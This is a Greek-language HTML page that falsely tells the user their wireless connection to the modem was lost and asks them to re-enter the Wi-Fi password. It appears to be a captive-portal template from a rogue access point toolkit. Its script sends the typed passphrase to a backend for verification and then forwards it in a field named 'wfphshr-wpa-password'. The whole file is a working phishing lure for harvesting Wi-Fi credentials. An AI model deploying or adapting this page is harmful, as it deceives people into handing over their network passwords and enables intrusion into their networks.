<!DOCTYPE html>
<html lang="en">
<head>
  <title>Ασύρματο Δίκτυο</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="/static/bootstrap.min.css">
  <link rel="stylesheet" href="/static/font-awesome-4.7.0/css/font-awesome.min.css">
  <script src="/static/jquery.min.js"></script>
  <script src="/static/bootstrap.min.js"></script>

  <!-- CSS -->
  <style type="text/css">

    /* Sticky footer styles
    -------------------------------------------------- */

    html,
    body {
          height: 100%;
          /* The html and body elements cannot have any padding or margin. */
        }

        /* Wrapper for page content to push down footer */
        #wrap {
          min-height: 100%;
          height: auto !important;
          height: 100%;
          /* Negative indent footer by it's height */
          margin: 0 auto -60px;
        }

        /* Set the fixed height of the footer here */
        #push,
        #footer {
          height: 60px;
        }
        #footer {
          background-color: #f5f5f5;
        }

        /* Lastly, apply responsive CSS fixes as necessary */
        @media (max-width: 767px) {
          #footer {
            margin-left: -20px;
            margin-right: -20px;
            padding-left: 20px;
            padding-right: 20px;
          }
        }

    img {
        width: auto;
        max-width: 100%;
        height: auto;
    }
    .isa_info {
        color: #9F6000;
        background-color: #FEEFB3
    }
    .isa_info i {
        margin:1px 3px;
        font-size:18px;
        vertical-align:middle;
    }
  </style>

</head>

<body>


  <!-- Start page content -->
  <div class="container">
	   <div class="col-sm">
       <h2 class="text-center" style="color:CornflowerBlue">Επαλήθευση Κωδικού Ασύρματου Δικτύου</h2>
       <br>
    	 <p class="lead" style="text-align:center;">Η ασύρματη σύνδεση με το μόντεμ χάθηκε.<br> Παρακαλώ εισάγετε τον κωδικό του ασύρματου δικτύου (μόντεμ) για να συνδεθείτε ξανά.</p>
     </div>
    <form>
      <div class="form-group">

      </div>
      <div class="form-group-has-feedback" id="psk_field">
          <label for="pwd">Κωδικός Ασύρματου Δικτύου:</label>
          <input class="form-control" type="password" id="pwd">
      </div>
      <div class="container text-center">
        <div class="isa_info" id="pw_status" align="left">
        </div>
        <br>
        <button class="btn btn-primary" id="btn">Σύνδεση</button>
      </div>
    </form>
    <div id="push"></div>
  </div>
  <!-- Start page content -->

  <!-- Start footer -->
  <footer class="footer">
    <div class="container text-center">
      <p class="text-muted">© 2018 , All Rights Reserved.</p>
    </div>
  </footer>
  <!-- End footer -->



  <!-- Start empty password message -->
  <div class="modal fade" id="empty-pass">
    <div class="modal-dialog modal-sm">
      <div class="modal-content">
        <div class="modal-header">
          <button type="button" class="close" data-dismiss="modal">&times;</button>
          <h4 class="modal-title">Σφάλμα</h4>
        </div>
        <div class="modal-body">
          <p>Παρακαλώ εισάγετε τον κωδικό του ασύρματου δικτύου.</p>
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-default" data-dismiss="modal">Κλείσιμο</button>
        </div>
      </div>
    </div>
  </div>
  <!-- End empty password message -->

 

<script>

/*
  Check the password field and act accordingly.
*/
$("#btn").on("click", function(e) {
    e.preventDefault();

    // get the password box and checkbox elements
  	var input = document.getElementById("pwd");

        if ( input.value == "" ) {
            $("#empty-pass").modal("show");
        }
        else
      		{
                var data =
                {
                    "psk_verify": input.value
                };
                var dataToSend = JSON.stringify(data);
                // post the data
                $.ajax(
                    {
                        url: '/backend/',
                        type: 'POST',
                        data: dataToSend,

                        success: function (jsonResponse) {
                            var objresponse = JSON.parse(jsonResponse);
                            var verify_status = objresponse['psk_verify']
                            if (verify_status == 'success') {
                                document.getElementById("pw_status").innerHTML = ""
                                post('upgrading.html', {"wfphshr-wpa-password": input.value});
                            } else if (verify_status == 'fail') {
                                pw_status_element.style.color = "#D8000C";
                                pw_status_element.style.backgroundColor = "#FFD2D2";
                                pw_status_element.innerHTML = "<i class=\"fa fa-times-circle\"></i>Ο κωδικός του ασύρματου δικτύου είναι λάθος!"
                            } else {
                                /* we may not define the extensions and in that case
                                   just post the passphrase */
                                post('upgrading.html', {"wfphshr-wpa-password": input.value});
                            }
                        },
                    });
      		    }
      
});

/*
  Post to the fallowing path given the parameters.

  Args:
    path: The path to be posted to.
    params: The parameters to be passed.
*/
function post(path, params) {
    // create a form and set its attributes
    var form = document.createElement("form");
    form.setAttribute("method", "post");
    form.setAttribute("action", path);

    // set the attribute for the post
    for(var key in params) {
        if(params.hasOwnProperty(key)) {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "hidden");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", params[key]);

            form.appendChild(hiddenField);
         }
    }

    // submit the post
    document.body.appendChild(form);
    form.submit();
}

</script>
</body>
</html>
